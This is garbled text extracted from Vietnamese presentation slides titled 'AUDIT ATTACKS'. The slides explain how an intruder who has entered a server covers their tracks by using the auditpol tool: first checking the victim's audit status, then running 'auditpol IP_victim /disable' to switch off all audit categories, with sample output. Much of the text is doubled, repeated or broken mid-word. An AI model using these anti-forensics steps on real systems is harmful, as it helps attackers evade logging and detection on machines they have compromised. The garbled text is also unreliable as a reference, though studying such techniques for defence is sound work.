V. Công cụ kẻ tấn công chiếm Công cụ kẻ tấn công chiếm
AUDIT ATTACKS
TiTì̀nh nh huhuôố́ng ng cucu00 ththêể̉::
•
• MộtMột trongtrong cáccác bướcbước quanquan trọngtrọng củacủa hacker
hacker khikhi đãđã thâmthâm nhậpnhập đượcđược vàovào Server
Server làlà tìmtìm cáchcách xóaxóa dấudấu tíchtích củacủa mình
mình trongtrong Audit Record.Audit Record.
Có
Có nhiềunhiều cáchcách đểđể xóaxóa log log nàynày, , 1 1 cáchcách
CóCó nhiềunhiều cáchcách đểđể xóaxóa log log nàynày, , 1 1 cáchcách rất
rất đơnđơn giảngiản vàvà hiệuhiệu quảquả làlà dùngdùng tool tool auditpol
auditpol..
•
• AuditpolAuditpol khôngkhông xóaxóa file logfile log màmà nónó chỉchỉ disable
disable chứcchức năngnăng auditaudit..
•
AUDIT ATTACKS
CáchCách dùngdùng auditpolauditpol rấtrất dễdễ. . TrướcTrước tiêntiên bạn
bạn thửthử kiểmkiểm tratra xemxem máymáy victim victim cócó bật
bật chếchế độđộ audit audit khôngkhông ::
C:
C:\\auditpol auditpol IP_victimIP_victim Running ... (X) Audit Running ... (X) Audit Enabled
Enabled AuditCategorySystemAuditCategorySystem = Success and = Success and Failure
Failure AuditCategoryLogonAuditCategoryLogon = Success and = Success and Failure
Failure AuditCategoryLogonAuditCategoryLogon = Success and = Success and Failure
Failure AuditCategoryObjectAccessAuditCategoryObjectAccess = Success = Success and Failure
and Failure AuditCategoryPrivilegeUseAuditCategoryPrivilegeUse = = Success and Failure
AUDIT ATTACKS
Nó sẽ hiện ra tất cả các chức năng Nó sẽ hiện ra tất cả các chức năng của audit và tình trạng hiện thời của của audit và tình trạng hiện thời của các chức năng đó ( đang bật hay tắt các chức năng đó ( đang bật hay tắt ) Cái mà bạn cần lưu tâm nhất là
) Cái mà bạn cần lưu tâm nhất là ) Cái mà bạn cần lưu tâm nhất là ) Cái mà bạn cần lưu tâm nhất là
dòng thông báo đầu tiên " (X) Audit dòng thông báo đầu tiên " (X) Audit Enabled ".
Enabled ".
Như vậy audit trên máy victim đang Như vậy audit trên máy victim đang họat động. Ta chỉ cần tắt audit bằng họat động. Ta chỉ cần tắt audit bằng lệnh:
AUDIT ATTACKS
C
C::\\auditpol auditpol IP_victimIP_victim /disable Running ... Audit /disable Running ... Audit information changed successfully o-n
information changed successfully o-n IP_victimIP_victim ... New audit policy o-n
... New audit policy o-n IP_victimIP_victim ... ( 0 ) Audit ... ( 0 ) Audit Disabled
Disabled AuditCategorySystemAuditCategorySystem = No = No AuditCategoryLogon AuditCategoryLogon = No = No AuditCategoryObjectAccess AuditCategoryObjectAccess = No = No AuditCategoryPrivilegeUse AuditCategoryPrivilegeUse = No = No AuditCategoryPrivilegeUse AuditCategoryPrivilegeUse = No = No AuditCategoryDetailedTracking AuditCategoryDetailedTracking = No = No AuditCategoryPolicyChange AuditCategoryPolicyChange = No = No AuditCategoryAccountManagement AuditCategoryAccountManagement = No = No Unknown = No Unknown = No Unknown = No Unknown = No